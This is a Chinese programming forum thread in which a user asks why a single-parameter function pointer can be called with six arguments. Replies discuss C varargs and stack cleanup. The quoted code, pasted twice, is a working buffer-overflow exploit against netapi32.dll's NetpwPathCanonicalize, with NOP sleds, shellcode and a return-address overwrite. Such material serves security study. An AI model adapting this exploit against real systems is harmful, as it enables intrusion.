16,551
社区成员
发帖
与我相关
我的任务
分享问个关于函数指针的问题呀,函数指针的参数只有一个LPTSTR,为什么用指针调用的时候可以有多个参数??
#include <windows.h>
#include <winbase.h>
typedef void (*MYPROC)(LPTSTR);
//0x100 for buf1 0x2 for / 0x312 for ebp before
#define STACK_SPACE 0x31A
//shellcode used to call a MessageBox named "failwest" :)
//you may need to reset the function address of MessageBox() and exit()
//which depends on your OS
char shellcode[]=
"\x66\x81\xEC\x40\x04\x33\xDB\x53\x68\x77\x65\x73\x74\x68\x66\x61"
"\x69\x6C\x8B\xC4\x53\x50\x50\x53\xB8"
"\xEA\x04\xD5\x77" //address of MessageBoxA in XP sp2 , user32.dll
"\xFF\xD0\x6A\x00\xB8"
"\xDA\xCD\x81\x7C" //address of exit() in XP sp2 , kernel32.dll
"\xFF\xD0";
int main()
{
char arg_1[0x320]; //will be used as 2nd section of path string
//we will use 4 bytes at the tail of the string
//to replace eip , lead the CPU execute our shellcode
char arg_2[0x440]; //receive formated path string which generated by
//vulnerability function
int arg_3=0x440; //specify the length of arg_2
char arg_4[0x100]; //will be used as 1st section of path string
//as we analyzed in paper, it can't be more
//than 0x206 bytes. We set our shellcode here !
long arg_5=44; //I'm also crossed in this function, it will be reseted as 0 by function
//If the first byte was not 0 , it will jump out the validate function
//this parameter is also useless in vulnerability using
//load vulnerability netapi32.dll which we got from a WIN2K sp4 host
HINSTANCE LibHandle;
MYPROC ProcAdd;
char dllbuf[40] = "./netapi32.dll"; // care for the path
//make sure your loading is what you want
char Trigger[40] = "NetpwPathCanonicalize";
LibHandle = LoadLibrary(dllbuf);
ProcAdd = (MYPROC) GetProcAddress(LibHandle, Trigger);
memset(arg_1,0,sizeof(arg_1));
memset(arg_2,0,sizeof(arg_2));
memset(arg_4,0,sizeof(arg_4));
memset(arg_1,0x90,sizeof(arg_1)-4);
memset(arg_4,0x90,sizeof(arg_4)-4);//string should be cut by 2 bytes 0
memcpy(arg_4+0x40,shellcode,0x28);// care for the length of shellcode
arg_1[STACK_SPACE+0]=0xF9;
arg_1[STACK_SPACE+1]=0x52;
arg_1[STACK_SPACE+2]=0x18;
arg_1[STACK_SPACE+3]=0x75; //eip will be replaced in this word
//we find an instruction address of "call ecx" in
//netapi32.dll process space, it is 0x751852F9
(ProcAdd)(arg_1,arg_2,arg_3,arg_4,&arg_5,0);
FreeLibrary(LibHandle);
}
#include <winbase.h>
typedef void (*MYPROC)(LPTSTR);
//0x100 for buf1 0x2 for / 0x312 for ebp before
#define STACK_SPACE 0x31A
//shellcode used to call a MessageBox named "failwest" :)
//you may need to reset the function address of MessageBox() and exit()
//which depends on your OS
char shellcode[]=
"\x66\x81\xEC\x40\x04\x33\xDB\x53\x68\x77\x65\x73\x74\x68\x66\x61"
"\x69\x6C\x8B\xC4\x53\x50\x50\x53\xB8"
"\xEA\x04\xD5\x77" //address of MessageBoxA in XP sp2 , user32.dll
"\xFF\xD0\x6A\x00\xB8"
"\xDA\xCD\x81\x7C" //address of exit() in XP sp2 , kernel32.dll
"\xFF\xD0";
int main()
{
char arg_1[0x320]; //will be used as 2nd section of path string
//we will use 4 bytes at the tail of the string
//to replace eip , lead the CPU execute our shellcode
char arg_2[0x440]; //receive formated path string which generated by
//vulnerability function
int arg_3=0x440; //specify the length of arg_2
char arg_4[0x100]; //will be used as 1st section of path string
//as we analyzed in paper, it can't be more
//than 0x206 bytes. We set our shellcode here !
long arg_5=44; //I'm also crossed in this function, it will be reseted as 0 by function
//If the first byte was not 0 , it will jump out the validate function
//this parameter is also useless in vulnerability using
//load vulnerability netapi32.dll which we got from a WIN2K sp4 host
HINSTANCE LibHandle;
MYPROC ProcAdd;
char dllbuf[40] = "./netapi32.dll"; // care for the path
//make sure your loading is what you want
char Trigger[40] = "NetpwPathCanonicalize";
LibHandle = LoadLibrary(dllbuf);
ProcAdd = (MYPROC) GetProcAddress(LibHandle, Trigger);
memset(arg_1,0,sizeof(arg_1));
memset(arg_2,0,sizeof(arg_2));
memset(arg_4,0,sizeof(arg_4));
memset(arg_1,0x90,sizeof(arg_1)-4);
memset(arg_4,0x90,sizeof(arg_4)-4);//string should be cut by 2 bytes 0
memcpy(arg_4+0x40,shellcode,0x28);// care for the length of shellcode
arg_1[STACK_SPACE+0]=0xF9;
arg_1[STACK_SPACE+1]=0x52;
arg_1[STACK_SPACE+2]=0x18;
arg_1[STACK_SPACE+3]=0x75; //eip will be replaced in this word
//we find an instruction address of "call ecx" in
//netapi32.dll process space, it is 0x751852F9
(ProcAdd)(arg_1,arg_2,arg_3,arg_4,&arg_5,0);
FreeLibrary(LibHandle);
}
...全文
请发表友善的回复…
发表回复
yyunffu 2008-08-31
- 打赏
- 举报
C下象是有1楼那么一说,这个不是很懂,关注学习。
fxbb 2008-08-31
- 打赏
- 举报
顺便说说,这个程序可以编译通过,楼上有人说不能编译通过,那是因为这个程序需要把netapi32.dll文件放在程序所在当前目录下
Mushu 2008-08-31
- 打赏
- 举报
可能是编译的时候,在call完函数后就平衡掉esp 所以不会出错
schlafenhamster 2008-08-31
- 打赏
- 举报
注意C中不定参数的函数的定义.如printf().
typedef void (*MYPROC)(LPTSTR format...);
typedef void (*MYPROC)(LPTSTR format...);
oldmanzhao 2008-02-07
- 打赏
- 举报
NetpwPathCanonicalize这个函数是几个参数?
cnzdgs 2008-02-07
- 打赏
- 举报
本来C参数传递规则是允许多传参数的,但你这种做法编译会出错。你可以把typedef void (*MYPROC)(LPTSTR);改成多个参数。
aj3423 2008-02-07
- 打赏
- 举报
编译->出错
sjdev 2008-02-06
- 打赏
- 举报
也有可能啊,如:
void Format( LPTSTR lpszFormat, ... );
